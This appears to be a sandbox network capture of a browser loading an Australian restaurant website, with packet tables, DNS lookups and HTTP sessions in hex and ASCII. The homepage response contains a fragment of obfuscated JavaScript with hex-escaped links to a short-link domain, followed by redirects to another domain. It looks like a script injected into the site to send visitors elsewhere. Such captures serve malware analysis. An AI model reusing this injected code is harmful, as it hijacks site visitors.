                                                                                                                                                    Oct 1, 2024 06:26:46.506376028 CEST49830443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.506436110 CEST44349830162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.506510019 CEST49830443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.507252932 CEST49830443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.507281065 CEST44349830162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.559568882 CEST49831443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.559654951 CEST44349831162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.559748888 CEST49831443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.560755014 CEST49831443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.560791016 CEST44349831162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.565135956 CEST49832443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.565176964 CEST44349832162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.565242052 CEST49832443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.565618992 CEST49832443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.565630913 CEST44349832162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.688080072 CEST49833443192.168.2.469.162.95.4
                                                                                                                                                    Oct 1, 2024 06:26:46.688155890 CEST4434983369.162.95.4192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.688268900 CEST49833443192.168.2.469.162.95.4
                                                                                                                                                    Oct 1, 2024 06:26:46.688894033 CEST49833443192.168.2.469.162.95.4
                                                                                                                                                    Oct 1, 2024 06:26:46.688924074 CEST4434983369.162.95.4192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.692303896 CEST49834443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.692334890 CEST44349834162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.692536116 CEST49834443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.692841053 CEST49834443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.692854881 CEST44349834162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.702452898 CEST49835443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.702476025 CEST44349835162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.702691078 CEST49835443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.703295946 CEST49836443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.703318119 CEST44349836162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.703401089 CEST49836443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.704116106 CEST49836443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.704127073 CEST44349836162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.704492092 CEST49835443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.704503059 CEST44349835162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.705353975 CEST49837443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.705382109 CEST44349837162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.705683947 CEST49837443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.706132889 CEST49837443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.706147909 CEST44349837162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.707134962 CEST49838443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.707142115 CEST44349838162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:46.707293987 CEST49838443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.707560062 CEST49838443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:46.707571030 CEST44349838162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.080544949 CEST44349829162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.086146116 CEST49829443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.086177111 CEST44349829162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.086529016 CEST44349829162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.115981102 CEST49829443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.116059065 CEST44349829162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.116516113 CEST49829443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.163398027 CEST44349829162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.187426090 CEST44349830162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.187669039 CEST49830443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.187690020 CEST44349830162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.187994003 CEST44349830162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.188693047 CEST49830443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.188756943 CEST44349830162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.188858986 CEST49830443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.235409975 CEST44349830162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.262645006 CEST49839443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.262671947 CEST44349839162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.262727976 CEST49839443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.263145924 CEST49840443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.263192892 CEST44349840162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.263267040 CEST49840443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.263407946 CEST49839443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.263420105 CEST44349839162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.263788939 CEST49841443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.263854980 CEST44349841162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.263995886 CEST49840443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.264009953 CEST49841443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.264024019 CEST44349840162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.264311075 CEST49841443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.264343977 CEST44349841162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.278073072 CEST44349831162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.278337955 CEST49831443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.278359890 CEST44349831162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.278706074 CEST44349831162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.279136896 CEST49831443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.279215097 CEST44349831162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.279275894 CEST49831443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.292515993 CEST44349832162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.292745113 CEST49832443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.292753935 CEST44349832162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.293713093 CEST44349832162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.293781042 CEST49832443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.294214010 CEST49832443192.168.2.4162.0.209.239
                                                                                                                                                    Oct 1, 2024 06:26:47.294269085 CEST44349832162.0.209.239192.168.2.4
                                                                                                                                                    Oct 1, 2024 06:26:47.294389963 CEST49832443192.168.2.4162.0.209.239
                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Oct 1, 2024 06:26:22.661338091 CEST192.168.2.41.1.1.10xc764Standard query (0)www.afghanhayatrestaurant.com.auA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:22.661612988 CEST192.168.2.41.1.1.10xa9cbStandard query (0)www.afghanhayatrestaurant.com.au65IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:24.572262049 CEST192.168.2.41.1.1.10x62b0Standard query (0)cuturls.netA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:24.573247910 CEST192.168.2.41.1.1.10x7b35Standard query (0)cuturls.net65IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:24.970642090 CEST192.168.2.41.1.1.10x7c1aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:24.971299887 CEST192.168.2.41.1.1.10x3d5cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:26.191272974 CEST192.168.2.41.1.1.10xe777Standard query (0)cuturls.netA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:26.192342043 CEST192.168.2.41.1.1.10xd81Standard query (0)cuturls.net65IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:28.211829901 CEST192.168.2.41.1.1.10xf1f8Standard query (0)ww1.cuturls.netA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:28.213715076 CEST192.168.2.41.1.1.10x500bStandard query (0)ww1.cuturls.net65IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:28.217030048 CEST192.168.2.41.1.1.10x8332Standard query (0)www.afghanhayatrestaurant.com.auA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:28.217796087 CEST192.168.2.41.1.1.10x6e7cStandard query (0)www.afghanhayatrestaurant.com.au65IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:27:00.649267912 CEST192.168.2.41.1.1.10xa55cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:27:00.649653912 CEST192.168.2.41.1.1.10x20b4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:27:25.021538019 CEST192.168.2.41.1.1.10x4252Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:27:25.021805048 CEST192.168.2.41.1.1.10x8818Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Oct 1, 2024 06:26:22.681265116 CEST1.1.1.1192.168.2.40xa9cbNo error (0)www.afghanhayatrestaurant.com.auafghanhayatrestaurant.com.auCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:22.686650991 CEST1.1.1.1192.168.2.40xc764No error (0)www.afghanhayatrestaurant.com.auafghanhayatrestaurant.com.auCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:22.686650991 CEST1.1.1.1192.168.2.40xc764No error (0)afghanhayatrestaurant.com.au162.0.209.239A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:24.769129992 CEST1.1.1.1192.168.2.40x62b0No error (0)cuturls.net162.210.196.168A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:24.977547884 CEST1.1.1.1192.168.2.40x7c1aNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:24.977916002 CEST1.1.1.1192.168.2.40x3d5cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:26.418570995 CEST1.1.1.1192.168.2.40xe777No error (0)cuturls.net69.162.95.4A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:29.183969021 CEST1.1.1.1192.168.2.40x8332No error (0)www.afghanhayatrestaurant.com.auafghanhayatrestaurant.com.auCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:29.183969021 CEST1.1.1.1192.168.2.40x8332No error (0)afghanhayatrestaurant.com.au162.0.209.239A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:29.298816919 CEST1.1.1.1192.168.2.40xf1f8No error (0)ww1.cuturls.netwww10.smartname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:29.298816919 CEST1.1.1.1192.168.2.40xf1f8No error (0)www10.smartname.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:29.298816919 CEST1.1.1.1192.168.2.40xf1f8No error (0)www10.smartname.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:29.307236910 CEST1.1.1.1192.168.2.40x500bNo error (0)ww1.cuturls.netwww10.smartname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:29.308434963 CEST1.1.1.1192.168.2.40x6e7cNo error (0)www.afghanhayatrestaurant.com.auafghanhayatrestaurant.com.auCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:34.865282059 CEST1.1.1.1192.168.2.40x4166No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:34.865282059 CEST1.1.1.1192.168.2.40x4166No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:36.257814884 CEST1.1.1.1192.168.2.40x5421No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:36.257814884 CEST1.1.1.1192.168.2.40x5421No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:37.494071960 CEST1.1.1.1192.168.2.40x807cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:37.494071960 CEST1.1.1.1192.168.2.40x807cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:55.459872961 CEST1.1.1.1192.168.2.40x721eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:26:55.459872961 CEST1.1.1.1192.168.2.40x721eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:27:00.655972004 CEST1.1.1.1192.168.2.40xa55cNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:27:00.656517982 CEST1.1.1.1192.168.2.40x20b4No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:27:15.148467064 CEST1.1.1.1192.168.2.40x377eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:27:15.148467064 CEST1.1.1.1192.168.2.40x377eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:27:25.028116941 CEST1.1.1.1192.168.2.40x4252No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 1, 2024 06:27:25.028548002 CEST1.1.1.1192.168.2.40x8818No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.4497663.33.243.145805428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 1, 2024 06:26:29.416681051 CEST268OUTGET / HTTP/1.1
                                                                                                                                                    Host: ww1.cuturls.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Oct 1, 2024 06:26:29.872807980 CEST259INHTTP/1.1 200 OK
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Tue, 01 Oct 2024 04:26:29 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 114
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                    Oct 1, 2024 06:27:14.890105009 CEST6OUTData Raw: 00
                                                                                                                                                    Data Ascii:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.4497743.33.243.145805428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 1, 2024 06:27:14.478801012 CEST6OUTData Raw: 00
                                                                                                                                                    Data Ascii:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.449736162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:23 UTC675OUTGET / HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:23 UTC246INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    content-length: 21465
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:23 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:23 UTC16138INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 61 67 72 61 50 72 6f 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 66 67 68 61 6e 20 48 61 79 61 74 20 52 65 73 74 61 75 72 61 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="author" content="AdagraPro"> <title>Afghan Hayat Restaurant</title> <
                                                                                                                                                    2024-10-01 04:26:23 UTC5327INData Raw: 29 2c 27 5c 78 36 38 5c 78 37 34 5c 78 37 34 5c 78 37 30 5c 78 33 61 5c 78 32 66 5c 78 32 66 5c 78 36 33 5c 78 37 35 5c 78 37 34 5c 78 36 63 5c 78 37 39 5c 78 32 65 5c 78 36 63 5c 78 36 39 5c 78 37 36 5c 78 36 35 5c 78 32 66 5c 78 36 35 5c 78 34 61 5c 78 36 38 5c 78 33 34 5c 78 36 33 5c 78 33 38 34 27 2c 5f 30 78 33 65 63 33 38 61 28 30 78 31 39 37 29 2c 5f 30 78 33 65 63 33 38 61 28 30 78 31 39 34 29 2c 5f 30 78 33 65 63 33 38 61 28 30 78 31 38 66 29 2c 5f 30 78 33 65 63 33 38 61 28 30 78 31 39 36 29 2c 27 5c 78 36 38 5c 78 37 34 5c 78 37 34 5c 78 37 30 5c 78 33 61 5c 78 32 66 5c 78 32 66 5c 78 36 33 5c 78 37 35 5c 78 37 34 5c 78 36 63 5c 78 37 39 5c 78 32 65 5c 78 36 63 5c 78 36 39 5c 78 37 36 5c 78 36 35 5c 78 32 66 5c 78 34 66 5c 78 35 61 5c 78 35 36
                                                                                                                                                    Data Ascii: ),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x65\x4a\x68\x34\x63\x384',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x6c\x69\x76\x65\x2f\x4f\x5a\x56


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.449735162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:24 UTC613OUTGET /assets/vendors/themify-icons/css/themify-icons.css HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:24 UTC351INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:24 GMT
                                                                                                                                                    content-type: text/css
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 16450
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:24 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:24 UTC16384INData Raw: 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 74 68 65 6d 69 66 79 27 3b 0a 09 73 72 63 3a 75 72 6c 28 22 2e 2e 2f 66 6f 6e 74 73 2f 74 68 65 6d 69 66 79 2e 65 6f 74 3f 2d 66 76 62 61 6e 65 22 29 3b 0a 09 73 72 63 3a 75 72 6c 28 22 2e 2e 2f 66 6f 6e 74 73 2f 74 68 65 6d 69 66 79 2e 65 6f 74 3f 23 69 65 66 69 78 2d 66 76 62 61 6e 65 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 0a 09 09 75 72 6c 28 22 2e 2e 2f 66 6f 6e 74 73 2f 74 68 65 6d 69 66 79 2e 77 6f 66 66 3f 2d 66 76 62 61 6e 65 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 0a 09 09 75 72 6c 28 22 2e 2e 2f 66 6f 6e 74 73 2f 74 68 65 6d 69 66 79 2e 74 74 66 3f 2d 66 76 62 61 6e 65 22 29 20 66 6f 72 6d 61 74
                                                                                                                                                    Data Ascii: @font-face {font-family: 'themify';src:url("../fonts/themify.eot?-fvbane");src:url("../fonts/themify.eot?#iefix-fvbane") format("embedded-opentype"),url("../fonts/themify.woff?-fvbane") format("woff"),url("../fonts/themify.ttf?-fvbane") format
                                                                                                                                                    2024-10-01 04:26:24 UTC66INData Raw: 20 7b 0a 09 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 37 35 65 22 3b 0a 7d 0a 2e 74 69 2d 72 73 73 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b 0a 09 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 37 35 66 22 3b 0a 7d 0a
                                                                                                                                                    Data Ascii: {content: "\e75e";}.ti-rss-alt:before {content: "\e75f";}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    2192.168.2.449741162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:25 UTC597OUTGET /assets/vendors/animate/animate.css HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:25 UTC351INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:25 GMT
                                                                                                                                                    content-type: text/css
